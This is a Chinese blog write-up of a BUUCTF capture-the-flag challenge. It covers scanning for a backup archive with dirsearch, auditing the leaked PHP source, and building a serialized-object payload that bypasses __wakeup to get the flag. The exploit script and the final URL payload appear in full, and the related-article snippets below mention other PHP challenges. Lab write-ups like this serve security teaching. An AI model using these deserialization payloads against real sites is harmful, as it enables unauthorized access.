1.【BUUCTF】[极客大挑战 2019]PHP(反序列化)

最新推荐文章于 2025-04-13 10:42:35 发布
最新推荐文章于 2025-04-13 10:42:35 发布
阅读量1.2k 收藏 16
点赞数 53
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_86760082/article/details/145581803
版权

打开题目页面如下

很有趣的前端页面,猫猫会随着球的方向目光跟随,靠近猫猫还会把玩球

看到提示备份网站,但不知道备份文件名,用kali中的dirsearch扫描根目录试试

扫描特定的后缀,命令如下

dirsearch -u http://b3f2b09d-70f5-4961-934a-0e88cfca3f5d.node5.buuoj.cn:81/ -e bak,zip,rar,tar,old

结果如下

看到有www.zip

构造url

http://b3f2b09d-70f5-4961-934a-0e88cfca3f5d.node5.buuoj.cn:81/www.zip

看到下载完成,打开查看 

有如下几个文件

打开flag.php

 qyq,果然不可信,没那么简单

打开源码文件index.php

看到里面的php语句,直接开审

 <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

include 'class.php';
include 是一个文件包含语句

作用是将指定路径下的文件 class.php 的内容包含到当前脚本中

class.php 文件里所定义的函数、类、变量等都能够在当前脚本中使用。
若 class.php 文件不存在或者无法被找到,include 语句会产生一个警告信息(E_WARNING),但脚本会继续执行。
$select = $_GET['select'];
$_GET 是 PHP 中的一个超全局变量,用于接收通过 HTTP GET 请求方法传递过来的参数。

从 URL 的查询字符串里获取名为 select 的参数值,并将其赋值给变量 $select。
$res=unserialize(@$select);
unserialize 函数用于将经过序列化处理的字符串还原为原来的 PHP 数据结构(如数组、对象等)。这里是尝试把 $select 变量的值进行反序列化操作,然后将结果赋值给变量 $res。
@ 是 PHP 中的错误抑制符,作用是抑制 unserialize 函数在执行过程中可能产生的错误信息。

也就是说,即使 $select 的值不是一个有效的序列化字符串,脚本也不会输出错误信息。

再打开class.php文件

<?php
// 包含 flag.php 文件,通常该文件中会定义存储 flag 的变量
include 'flag.php';

// 设置错误报告级别为 0,即关闭所有的错误报告
error_reporting(0);

// 定义一个名为 Name 的类
class Name{
    // 定义一个私有属性 $username,初始值为 'nonono'
    private $username = 'nonono';
    // 定义一个私有属性 $password,初始值为 'yesyes'
    private $password = 'yesyes';

    // 类的构造函数,当创建 Name 类的对象时会自动调用
    // 接收两个参数 $username 和 $password,并将其赋值给类的私有属性
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    // __wakeup 是 PHP 的魔术方法,当使用 unserialize 反序列化对象时会自动调用
    // 此方法将 $this->username 的值设置为 'guest'
    function __wakeup(){
        $this->username = 'guest';
    }

    // __destruct 是 PHP 的魔术方法,当对象被销毁时会自动调用
    function __destruct(){
        // 检查 $this->password 是否不等于 100
        if ($this->password != 100) {
            // 如果不等于 100,输出提示信息表明是黑客行为
            echo "</br>NO!!!hacker!!!</br>";
            // 输出用户名信息
            echo "You name is: ";
            echo $this->username;echo "</br>";
            // 输出密码信息
            echo "You password is: ";
            echo $this->password;echo "</br>";
            // 终止脚本执行
            die();
        }
        // 检查 $this->username 是否严格等于 'admin'
        if ($this->username === 'admin') {
            // 使用 global 关键字引入全局变量 $flag
            global $flag;
            // 输出 $flag 的值,即 flag 内容
            echo $flag;
        } else {
            // 如果 $this->username 不等于 'admin',输出友好提示信息
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            // 终止脚本执行
            die();
        }
    }
}
?>

代码审计

反序列化漏洞:代码直接对用户通过 URL 传递的 select 参数进行反序列化操作,可以构造恶意的序列化数据来绕过 __wakeup 方法和 __destruct 方法中的验证逻辑,从而获取 flag。
__wakeup 绕过漏洞:在 PHP 5.6.25 及之前版本和 PHP 7.0.10 及之前版本中,如果序列化字符串中表示对象属性个数的值大于实际属性个数,__wakeup 方法将不会被调用,提供了绕过 __wakeup 方法中用户名重置的机会。

构造恶意序列化对象

构造一个满足 __destruct 方法中验证条件的序列化对象。
创建一个 Name 类的对象,将 $username 设置为 'admin',$password 设置为 100。
利用 __wakeup 绕过漏洞,构造序列化字符串时让属性个数大于实际属性个数。

构造恶意序列化对象的代码

<?php
class Name{
    private $username = 'admin';
    private $password = 100;
}

$obj = new Name();
$serialized = serialize($obj);
// 绕过 __wakeup,将属性个数修改为大于实际属性个数
$exploit = str_replace('O:4:"Name":2:', 'O:4:"Name":3:', $serialized);
echo $exploit;
?>

可以用下面这个在线工具运行代码

php在线运行,在线工具,在线编译IDE_w3cschool

结果

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

发送恶意请求

将构造好的序列化字符串作为 select 参数的值,通过 URL 发送给目标页面。

http://be705cd2-6410-4a44-a8f0-960efb677e1f.node5.buuoj.cn:81/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

服务器在处理该请求时会对 select 参数进行反序列化,由于绕过了 __wakeup 方法,并且满足 __destruct 方法中的验证条件

居然还是没有得到flag

原来需要将空格进行编码%00因为在执行时会减少空格

http://be705cd2-6410-4a44-a8f0-960efb677e1f.node5.buuoj.cn:81/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

最后得到flag

 

doubt。
关注
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化
等风来
08-24 7370
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
buuctf php(扫描网站备份文件和反序列化漏洞)
qq_44111753的博客
12-30 1221
知识点: 1、扫描网站备份文件 别人写的备份文件url生成字典脚本 import os import os.path import requests from urllib.parse import unquote suffixList = ['.rar','.zip','.tar','.tar.gz'] keyList = ['www','wwwroot','site','web','website','backup','data','mdb','WWW','新建文件夹','ceshi','databa
[极客挑战 2019]PHP 1
最新发布
qq_73831912的博客
04-13 970
打开网站可以发现“我有一个良好的备份网站的习惯”那我们试试找到网站的源码,使用dirmap。
buuctf php
ANYOUZHEN的博客
05-24 349
根据提示,网站一个有备份,我们打开御剑,直接扫它,发现了/www.zip,打开 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->userna..
BUUCTF PHP
m0_73867210的博客
02-03 352
习惯性的查看源码 但没发现什么,于是搜其他佬的文章得知这个题目重点在网站备份,我没有下载扫描网站的软件,看其他博主扫到的结果是有一个压缩文件的构造playload,得到压缩包 压缩得到四个代码文件 依次查看发现只有class.php与flag有关 分析代码,因为基础有欠缺,好几个函数不知道什么意思,看到别的博主说是PHP反序列化,咱也没听过,就复制了playload得到了flag 参考这位博主的文章也是学到了很多,比如网络备份文件,PHP反序列化,以及P
BUUCTF-PHP
z1moq的博客
09-07 1112
启动靶机,打开网页发现有提示说存在备份文件 直接使用 www.zip 下载备份源码 在 index.php 中发现反序列化函数 此文件包含了 class.php 所以继续前往该文件进行审查 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __con
[网络安全 CTF] BUUCTF极客挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客挑战 2019]php
2401_84971538的博客
05-13 767
自我介绍一下,小编13年上海交毕业,曾经在小公司待过,也去过华为、OPPO等厂,18年进入阿里一直到现在。深知多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 518
反序列化漏洞。
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 836
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 463
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
buuctf-PHP
xixihahawuwu的博客
11-23 1305
看题目说备份网站,扫一下看看 把文件下载下来 一些源码 这里的unserialize涉及到一个反序列化 接着看class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ .
BUUCTF--极客挑战php
woshicainiao666的博客
03-06 1653
www.zip。
BUUCTF——phpweb
weixin_45864041的博客
04-17 711
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
BUUCTF】[极客挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 2163
BUUCTF】[极客挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
BUUCTF [极客挑战 2019]PHP
qq_45694932的博客
09-07 246
用dirsearch扫描网站目录根据 命令 python dirsearch.py -u http://68b6f5c9-433a-4387-ab64-fd54034a861a.node4.buuoj.cn:81/ -e php -w 网站备份的字典路径 找到一个www.zip 文件 下载解压 在index.php中发现如下代码 文件包含了class.php文件 GET传参可以通过select参数传参 将变量select反序列化 class.php <?php include 'flag.php.
[BUUCTF][蓝帽杯 2021]One Pointer PHP
cosmoslin的博客
11-15 1848
考点 PHP数组溢出 绕过open_basedir 攻击php-fpm绕过disable functions Suid提权 源码 user.php <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化
weixin_44632787的博客
06-25 816
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化 题目 Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and
BUUCTF--[极客挑战 2019]PHP
qq_46263951的博客
09-04 366
学了几天的PHP反序列化漏洞,找一个比较简单的题练练手 进入后给出提示网站存在备份,尝试几种常见的备份目录或者也可以直接扫描目录 访问/www.zip时弹出下载框,得到源代码,flag.php文件只有被调用执行才可获得到flag 在index.php中发现这样一段代码 <?php include 'class.php'; $select = $_GET['select']; //可控参数 $res=unserialize(@$select); //反序列化 ?> ...
PHP 反序列化 buuctf
01-23
### PHP 反序列化 buuCTF 挑战解题思路 #### 一、题目背景与环境设置 在buuctf平台上,存在多个涉及PHP反序列化挑战。这些挑战通常提供一段PHP代码供参赛者审计并找出漏洞所在。例如,在NewStarCTF中的`UnserializeOne`题目中,参与者需深入理解给定的PHP脚本逻辑及其潜在的安全隐患[^1]。 #### 二、核心概念解析 对于此类题目而言,掌握PHP对象序列化和反序列化的机制至关重要。当一个对象被序列化后会转换成字符串形式存储;而通过特定手段操控该字符串再将其传递回程序执行反序列操作,则可能触发预设之外的行为模式。特别是在某些情况下,如果开发者定义了特殊方法如`__destruct()`、`process()`以及`read()`等,它们会在反序列过程中自动调用,这便成为了解决这类问题的关键切入点之一[^3]。 #### 三、具体实例分析 以一次成功的解题为例,为了使条件判断语句成立进而获得flag,需要让两个属性值相等——即`$correct`为空串且与另一个同名变量指向同一内存地址。因此可以构建如下所示的对象结构并通过`serialize()`函数得到相应的payload: ```php <?php class BUU { public $correct = ""; public $input = ""; } $a = new BUU(); $a->correct = ""; $a->input =& $a->correct; echo serialize($a); ?> ``` 上述代码片段创建了一个名为`BUU`的新类实例,并设置了其内部成员之间的引用关系使得二者共享相同的值空间。最终输出的结果即是可用于提交测试的有效载荷数据[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值